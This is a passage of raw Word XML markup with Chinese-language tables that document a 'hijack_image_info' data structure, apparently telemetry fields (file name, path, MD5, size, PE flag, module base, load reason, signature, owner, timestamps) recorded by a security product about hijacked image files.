          <w:p w14:paraId="643C2EB6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73D8E636" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t xml:space="preserve">被劫持的映像文件信息 </w:t>
            </w:r>
            <w:hyperlink w:anchor="hijackimageinfo数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>hijack_image_info数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45852D96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="256" w:name="hijackimageinfo数据结构"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>hijack_image_info数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2248"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="4481"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="64F02CB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132AD42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="302D87AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DBAFBB8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6957B60E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3652A2B5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CF095CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64AF4564" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3305F375" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06599916" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6A4D3052" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B38B8B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A124E51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B536878" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29DBA4C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件所在目录的全路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0ECF072C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E43A550" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7429BAA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FE9F17A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CE1D5AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件所在目录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2091454A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3752D4BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FB82183" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55EA8A09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21BE6765" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件md5值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="760B24D5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="001BF92F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C33369F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63C35497" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5791237C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4338D335" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="249108F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>extension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B1118A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09EAEE33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14C0CB02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扩展名，如”.exe”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="714EF050" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="760B7D08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31C88183" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="741D3DC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20D6F3AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件属性，无效时为INVALID_FILE_ATTRIBUTES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="678457C8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C661D4D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>b_pe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="747F1712" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AA4F05F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34A63678" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否是PE文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="40CBE671" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B288AB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>module_base_str</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D5E805F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D6F99F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D71C628" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块基址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="04DB1249" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="695444E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>load_reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60E45989" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="334BD422" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F15DD63" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>加载原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="43442725" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63591C9C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>module_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CAB7F4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A3FF675" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52DEAA9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6011A40C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="289E95AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>load_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66E0E284" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C5EC588" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3ACCDB9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>加载时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="301F0A10" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FCF38ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BC7AA65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65E0DDC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EA8E325" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6DF6223B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31D1D8F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A7D2457" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE808AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19A1C458" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0501A47B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="168C2F77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B05AFCA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44359DC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57F249AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件所有者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="361FFB13" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B0FB75C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14FA1280" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58A47651" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="385BD5A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>32/64/空 表示 32位文件，64位文件，空未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5A32664D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03EFE378" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_ctime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24F624B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11EB948B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15AE48FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件create time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="10B1BD63" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A8B7CC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_mtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="343DB75B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EAFDD39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BC6B243" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件modify time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="39B3DC05" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DBB3AFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_atime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
